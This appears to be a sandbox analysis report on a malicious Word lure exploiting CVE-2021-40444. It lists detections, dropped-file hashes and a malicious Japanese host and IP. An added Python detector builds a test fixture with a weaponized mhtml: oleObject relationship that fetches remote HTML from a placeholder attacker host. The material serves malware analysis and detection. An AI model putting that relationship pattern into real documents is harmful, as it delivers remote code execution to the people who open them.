Windows
Analysis Report
Payment copy_2911022.docx.doc
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 1608, cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| EXPL_CVE_2021_40444_Document_Rels_XML | Detects indicators found in weaponized documents that exploit CVE-2021-40444 | Jeremy Brown / @alteredbytes | |
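The rule above keys on the document's relationship XML. The script below is an added example, not code from this report or from the cited YARA rule: it reproduces that check statically by opening the .docx as an OPC package and flagging any external oleObject relationship whose Target uses the mhtml: scheme (usually chained through !x-usc: to the remote HTML that MSHTML then loads). It goes slightly beyond the rule by walking every .rels part, not just word/_rels/document.xml.rels. The two packages it scans are constructed in memory; the host name attacker.invalid in the weaponized fixture is a placeholder, not the domain contacted by the sample in this report (whose rels content the report does not show).

```python
"""Static check for the CVE-2021-40444 relationship pattern in a .docx.

Added example, not part of the Joe Sandbox report or the YARA rule it cites.
The fixtures are constructed here; attacker.invalid is a placeholder host.
"""
from __future__ import annotations

import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_OBJECT_TYPE = "/relationships/oleObject"

# Short tags returned per relationship, with what each one means for triage.
REASONS = {
    "external_oleobject": "external oleObject relationship: Word fetches the OLE object from a URL",
    "mhtml_scheme": "mhtml: scheme in Target: the fetch goes through the MSHTML/urlmon handler",
    "x_usc_inner_url": "!x-usc: in Target: the remote HTML that is actually loaded",
}

RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
BASE_RELS = (
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/page.html" TargetMode="External"/>'
    '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>'
)
# Constructed fixture: an ordinary document (internal OLE object, plain external hyperlink).
BENIGN_RELS = RELS_HEAD + BASE_RELS + "</Relationships>"
# Constructed fixture: the same document plus the CVE-2021-40444 shape (placeholder host).
WEAPONIZED_RELS = RELS_HEAD + BASE_RELS + (
    '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="mhtml:http://attacker.invalid/lure.html!x-usc:http://attacker.invalid/lure.html" TargetMode="External"/>'
    "</Relationships>")


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal Word package in memory: just enough OPC parts to carry the .rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                    '<Default Extension="xml" ContentType="application/xml"/>'
                    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
                    '</Types>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def classify_relationship(rel: ET.Element) -> list[str]:
    """Tags (keys of REASONS) that one <Relationship> element earns; empty means benign."""
    tags = []
    target = rel.get("Target", "").lower()
    external = rel.get("TargetMode", "").lower() == "external"
    if external and rel.get("Type", "").endswith(OLE_OBJECT_TYPE):
        tags.append("external_oleobject")
    if target.startswith("mhtml:"):
        tags.append("mhtml_scheme")
    if "!x-usc:" in target:
        tags.append("x_usc_inner_url")
    return tags


def scan_docx(data: bytes) -> list[dict]:
    """Walk every .rels part of the package and return one finding per suspicious relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A .rels part that does not parse deserves a look on its own (corruption or obfuscation).
                findings.append({"part": name, "id": None, "target": None, "tags": ["unparseable_rels"]})
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                tags = classify_relationship(rel)
                if tags:
                    findings.append({"part": name, "id": rel.get("Id"), "target": rel.get("Target"), "tags": tags})
    return findings


def looks_like_cve_2021_40444(data: bytes) -> bool:
    """True when a single relationship is both an external oleObject and an mhtml: target."""
    return any("external_oleobject" in f["tags"] and "mhtml_scheme" in f["tags"] for f in scan_docx(data))


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("weaponized", WEAPONIZED_RELS)):
        pkg = build_docx(rels)
        print(label, looks_like_cve_2021_40444(pkg))
        for f in scan_docx(pkg):
            print("  ", f["part"], f["id"], f["target"], [REASONS.get(t, t) for t in f["tags"]])
```

The verdict deliberately requires both signals on the same relationship: an external oleObject alone is legitimate (linked objects), and an mhtml: URL in a hyperlink is odd but not the exploit path. Run it against a real sample by passing the file bytes to scan_docx.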
AV Detection |
---|
Source: | Avira, ReversingLabs, Virustotal (per-engine hits are in the scanner table below) |
Exploits |
---|
Source: | Extracted files from sample; HTTPS traffic detected; File opened (detail values not preserved in this extraction) |
Remaining signature rows (their category headings were lost in extraction; only the evidence type and row count survive, not the hosts, ports, paths, registry keys or strings) |
---|
Source: | TCP traffic (320 rows), HTTPS traffic detected (12 in total), HTTP traffic detected (9), DNS query (7), DNS traffic detected (1), Network traffic detected (22), ASN Name (1), JA3 fingerprint (1) |
Source: | String found in binary or memory (4), File created (3), File opened (2 in total), File read (1), Key opened (2), LNK file (1), Matched rule (1), OLE stream indicators for Word, Excel, PowerPoint, and Visio (1), OLE document summary (3), Classification label (1), Window detected (1), Initial sample (2) |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample (1 row) |
Source: | Process information set (94 rows; the attribute values were stripped in extraction) |
ATT&CK techniques with matching signatures (in the Joe Sandbox matrix the leading number is the count of signatures mapped to that technique; the other cells of the grid carry no count and are unmatched placeholders):

Tactic | Technique | Signatures |
---|---|---|
Execution | Exploitation for Client Execution | 13 |
Defense Evasion | Masquerading | 1 |
Discovery | File and Directory Discovery | 1 |
Discovery | System Information Discovery | 2 |
Command and Control | Encrypted Channel | 1 |
Command and Control | Non-Application Layer Protocol | 3 |
Command and Control | Application Layer Protocol | 14 |
Command and Control | Ingress Tool Transfer | 4 |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 41% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 | |
| 46% | Virustotal | | Browse |
| 100% | Avira | EXP/CVE-2021-40444.Gen | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
(4 URLs, not preserved in this extraction; each rated as follows) | 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
pzsrblog.com | 118.27.125.229 | true | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
(1 URL, not preserved) | false | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(3 URLs, not preserved) | | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
118.27.125.229 | pzsrblog.com | Japan | | 7506 | INTERQGMOInternetIncJP | true |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 770660 |
Start date and time: | 2022-12-20 14:07:07 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Payment copy_2911022.docx.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winDOC@1/20@7/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
Similar samples by context (other analysed samples that share an indicator with this one; sample names, SHA-256 values and links did not survive extraction):

Match | Associated samples | Detection |
---|---|---|
INTERQGMOInternetIncJP (ASN name) | 20 samples | all malicious |
05af1f5ca1b87cc9cc9b25185115607d (32-hex-digit hash; presumably the JA3 fingerprint reported among the signatures) | 20 samples | all malicious |
Dropped file (path not preserved in this extraction)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2880914581185761 |
Encrypted: | false |
SSDEEP: | 48:I3rTGRB0Di+ZizW+BY4dCh0ERieLrEorjO56VcH:K+Li58zWaY6iYA86VcH |
MD5: | B53533125231DD0B586CB6715AE19CB6 |
SHA1: | A9E7566E4BB7CA451B8D9E3559C7F63607A4BD3E |
SHA-256: | 4BC81648A241EC2BC277A80D232691CD168B4DCC768B323D509ECD740BE75CF0 |
SHA-512: | D2F54F0347C2C9BD1268F7958DC3B3B76A8C962D6FC425E3C33D32F9DB142B266DADEB462189677E0CABFB024AAF94F186CC958C3A27D01545E6FA1EF11C8FD1 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D741663-0E54-4731-8095-222DB92ACF56}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6693472333421685 |
Encrypted: | false |
SSDEEP: | 96:K3G8RCyr8OairdIwgNOoGzn/iNFD3depKCHf6XZoZGPY/MkfO:jYdmBGT/wFD3depKCHf6XZoZeMMkfO |
MD5: | 5FC240531A725DDD31B36CFC13E5A401 |
SHA1: | AAA4F0EE3AB6F3A36E5D00218E8CA4167B7DE64C |
SHA-256: | 2AC86D569E45C0C59AC8046F7CC2BF0A149F46ED0B92CE93E7FAE2328FD3575A |
SHA-512: | E93C0C34DF4D673203BE4CA5EB1179ED463255EF6084BED59BEC440B3742CFF6A94CAA0424DB968A6ECF580F6F4106ACED5285083F97772C655B8883D516C733 |
Malicious: | false |
Reputation: | low |
Dropped file (path not preserved in this extraction)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 4.0043834000059455 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz1lDCrrPjlYDYwlVlc3lX3pQlQMDZ276:yPblz1Rsr+YAc3lnLMDZ22 |
MD5: | 29CE4C3AD91CA4ED32D0FE57B495FCC5 |
SHA1: | EFD857E3CAAFBDE2AE85672CFD4DCD99458CF465 |
SHA-256: | E19CB2B28AC900FD40B61E0807007B538CDEE091A0CA82F9A76ED48F997CB7C8 |
SHA-512: | 6AE9097FBAF9A541667BB44C9A5999ECD23A35E2C2291486067D7110960C3F0D35FBD2DF82864EA376456F16D4CF0E510F5AEFB0144FBC3DB061EC68E36FEC8A |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2866055829360173 |
Encrypted: | false |
SSDEEP: | 48:I31CRB6Cyp8tAgBWZFbQRczx8tbu4WubrfDslgRpcCDC1H:KAL6CyYAgBWr2ceu4WunfQce1H |
MD5: | 8F0A4FA071D865E8A556C2157191813E |
SHA1: | C92BC60B1C41760B7D4768C673AD0A4356FC8ED6 |
SHA-256: | 3406B7EC52AC5F6955F939021B73EB1AFE6938BAB96EB60FEE8E7AD52799997D |
SHA-512: | 8EBCF339C677C2C42FDC9131A5FEBB31D49F928BF7A5C5DA0C0F6B8BC2B6A04644BD5BD2A8381CFF4D66BB9A215E1539EE397FF1DBC2C899A2A28134A328643D |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC3E07E1-8ECD-43E4-B52E-9C0E75945771}.FSD
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22184406153599004 |
Encrypted: | false |
SSDEEP: | 48:I3+3UrBptM1865ZNUgqKS0ip6NIN1ZpIN1Z7:K+3CptivE0jy6NINHpINH7 |
MD5: | 354B23BB2531B0571E7808EF78C2BDDB |
SHA1: | 5959F89837C462172341FB541F34BE8556378E0C |
SHA-256: | C825D9DF8C6FFBC827CF12D1653ABB948DE07317F1EF7D5DD2E66E6B39B78497 |
SHA-512: | 93DD7F49CCB09725D871B6C509721064EE89CA449B92C385610CE6F5F416188E842F556615864906E367C0AFE74880413D86FB53483BB96BFB02013E29471744 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.938508180669744 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlziLVNOlQglm7SwORgQ3ggOSjRYUC/l276:yPblziL/Ol18ew7Q3gajRYUCt22 |
MD5: | 53F7D146048797564ACAEC8B2819EF0B |
SHA1: | 7DCC293F430710EC6929DFA75DDFB1EEC2A867E6 |
SHA-256: | 18FCDCB36C0D51EF510D8A33065F575DDD212BB7D54FF3767D31AE26D2597345 |
SHA-512: | 47EE50ACD25866E2B0EF2E20CA721C126E8D313FB6112F397877A6B12D1E989B79F64FFB930E022226BA5AA179DC4744A8CF3E4B35D2C24A2E665F58B40561FB |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\PROMZwFp385vXr[1] (Internet Explorer cache entry written during analysis; by SHA-256 it is byte-identical to the two Content.MSO .tmp files that follow)
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5321AD.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DEABB9E.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
Reputation: | low |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A7B07.jpg
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111840 |
Entropy (8bit): | 7.447827528335342 |
Encrypted: | false |
SSDEEP: | 3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY |
MD5: | 4D697D690AB2D1BAC4998162A6EEAE07 |
SHA1: | 6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522 |
SHA-256: | 23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450 |
SHA-512: | 201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9 |
Malicious: | false |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4608 |
Entropy (8bit): | 2.2918709222363574 |
Encrypted: | false |
SSDEEP: | 24:rNKOUp03SHIDFJIDfrBexrBez7HrBeIiOID:rNKKtKfrBWrBYjrB/iD |
MD5: | DDD1A7B7584FE963025B7877753363E9 |
SHA1: | 3231DC3627E692457A46A5A232F3C08EED393593 |
SHA-256: | 56E7BBA8F55A2766D6BFE10F89AC631AE171A800B017FC5E7BFA1B86830DFFAA |
SHA-512: | 34F084E344268DE2F67AD2674B6E2A7915E2F9023F79ED3E2C6BB3A12300321097C7A1139CE147D7B7BCFBBD2226FCE086094355B184053172A1E26454D55D5D |
Malicious: | false |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22016 |
Entropy (8bit): | 3.726896001733367 |
Encrypted: | false |
SSDEEP: | 192:L/iOgOnpOwOdOiA4vzxO6LvF6iCs3LGL9Ql/XWMjZcLPOiCzS2zcFLNkIsehNACh:LTl0V4VF63Nr+eE1 |
MD5: | 2D3B22EB9A941A88E1FBE9CC6F0AD47B |
SHA1: | 3BABC72BE2E9724860AFCBC84F6F084BCE67C05A |
SHA-256: | 077B64253FAF9C648A350EEB76A4583D396A9F390D2732B73E024DE756ECB52F |
SHA-512: | B913ED1B0EA6AF625102C2E48C20084408B7C34067EF127FC4A0BFBC8B447A56D5F45659D6FE89694BF1224CB411CFF7EA76444361F036567B2EECA6A738CE41 |
Malicious: | false |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.02557421810106493 |
Encrypted: | false |
SSDEEP: | 6:I3DPce3FvxggLRd68ShIKfljt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPJpSjbvYg3J/ |
MD5: | 79629860A8A7062100568BA988AA92E5 |
SHA1: | 04EB84E685B4ED1633C9A24F945CA4E4EFF440F9 |
SHA-256: | B4490EEF80275645ADF8E6DA434925E61B0C7E7CEC78BDA28C80A45593674C25 |
SHA-512: | 44032143469737F083D1B979DD04BBC9C28DB3584812810DE216ADE8E0763D6FDBE6235F73A5582D86839EE63C963712BA36349F865723509E8D4A909DA3B45E |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025598214431537702 |
Encrypted: | false |
SSDEEP: | 6:I3DPcA2VvxggLRqNf/XiZkqxFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPIZsXGdvYg3J/ |
MD5: | 4E0BB04AF2E5963F5B13FE28926EA850 |
SHA1: | A1F8759D658FE4FD793A0C6756BE56CF1BAA6C5E |
SHA-256: | 144E84C6E11326F22EC9934B0C473BD33708C4D1AAC32A967D083E7A0F7B9742 |
SHA-512: | 4037BD00DB042D87AADE73C529F218778ABF1675C6BD37F8AA25F4CE38E18E77470661710711D16B7D809AAEE9288C032F7A31A1CF46B882203D53A289CF4975 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1089 |
Entropy (8bit): | 4.586578560978497 |
Encrypted: | false |
SSDEEP: | 12:8ovgXg/XAlCPCHaXNBQtB/SxXX+Wdl91UWY5iEcH4icvbTXevyXl4KDtZ3YilMMe:8i/XT9SUXmWZEcHreHXevy1ZDv3q+u7D |
MD5: | 42568C6DD23F1300A99ED8669616B647 |
SHA1: | 205A7AEEA5E8CC501DE65B0398F6511123590B6E |
SHA-256: | 403995B5D0C5466BCD2EA065BCFA60259DE797DA2B36290DC6D140F2FEBEF164 |
SHA-512: | 16464D686024260D930ECA3255461A6130CD7B0B33A9474CAE72F7A03BBEE55B733BFB8195594F31E65A07FEC80ECBE9A06FFB1C91C4336430D251E9E4B30DBD |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 101 |
Entropy (8bit): | 4.8491372958945425 |
Encrypted: | false |
SSDEEP: | 3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc |
MD5: | 83166E435F433132ECCE71984113EC6B |
SHA1: | 630B8125CF2F042D3C939B375300C4A03B849927 |
SHA-256: | DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308 |
SHA-512: | DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
File type: | |
Entropy (8bit): | 7.994989792624349 |
TrID: |
File name: | Payment copy_2911022.docx.doc |
File size: | 110504 |
MD5: | cd3dbd5f1d468da826581361b619b393 |
SHA1: | 9d5fc2d99aec7c8c18d8af7267b4a31801fda770 |
SHA256: | 1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f |
SHA512: | 91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf |
SSDEEP: | 1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q |
TLSH: | 56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669 |
File Content Preview: | PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C |
Icon Hash: | e4eea2aaa4b4b4a4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 20, 2022 14:08:00.933084011 CET | 192.168.2.22 | 8.8.8.8 | 0x2507 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:03.900677919 CET | 192.168.2.22 | 8.8.8.8 | 0x1150 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:04.183038950 CET | 192.168.2.22 | 8.8.8.8 | 0x1aac | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:09.143189907 CET | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:09.418085098 CET | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:16.610516071 CET | 192.168.2.22 | 8.8.8.8 | 0xc9b | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Dec 20, 2022 14:08:16.633646965 CET | 192.168.2.22 | 8.8.8.8 | 0xa51f | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 20, 2022 14:08:01.202795029 CET | 8.8.8.8 | 192.168.2.22 | 0x2507 | No error (0) | | | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
